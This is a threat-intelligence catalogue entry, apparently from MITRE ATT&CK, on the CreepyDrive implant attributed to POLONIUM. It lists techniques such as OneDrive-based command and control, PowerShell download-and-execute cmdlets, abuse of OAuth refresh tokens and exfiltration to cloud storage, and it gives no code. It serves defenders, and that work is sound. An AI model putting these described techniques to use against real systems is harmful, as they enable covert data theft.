S1023 CreepyDrive
CreepyDrive is a custom implant has been used by POLONIUM since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.1
POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.1
| Item | Value |
|---|---|
| ID | S1023 |
| Associated Names | |
| Type | MALWARE |
| Version | 1.0 |
| Created | 07 July 2022 |
| Last Modified | 10 August 2022 |
| Navigation Layer | View In ATT&CK® Navigator |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1071 | Application Layer Protocol | - |
| enterprise | T1071.001 | Web Protocols | CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.1 |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | CreepyDrive can use Powershell for execution, including the cmdlets Invoke-WebRequest and Invoke-Expression.1 |
| enterprise | T1005 | Data from Local System | CreepyDrive can upload files to C2 from victim machines.1 |
| enterprise | T1567 | Exfiltration Over Web Service | - |
| enterprise | T1567.002 | Exfiltration to Cloud Storage | CreepyDrive can use cloud services including OneDrive for data exfiltration.1 |
| enterprise | T1083 | File and Directory Discovery | CreepyDrive can specify the local file path to upload files from.1 |
| enterprise | T1105 | Ingress Tool Transfer | CreepyDrive can download files to the compromised host.1 |
| enterprise | T1550 | Use Alternate Authentication Material | - |
| enterprise | T1550.001 | Application Access Token | CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive.1 |
| enterprise | T1102 | Web Service | - |
| enterprise | T1102.002 | Bidirectional Communication | CreepyDrive can use OneDrive for C2.1 |
Groups That Use This Software
| ID | Name | References |
|---|---|---|
| G1005 | POLONIUM | 1 |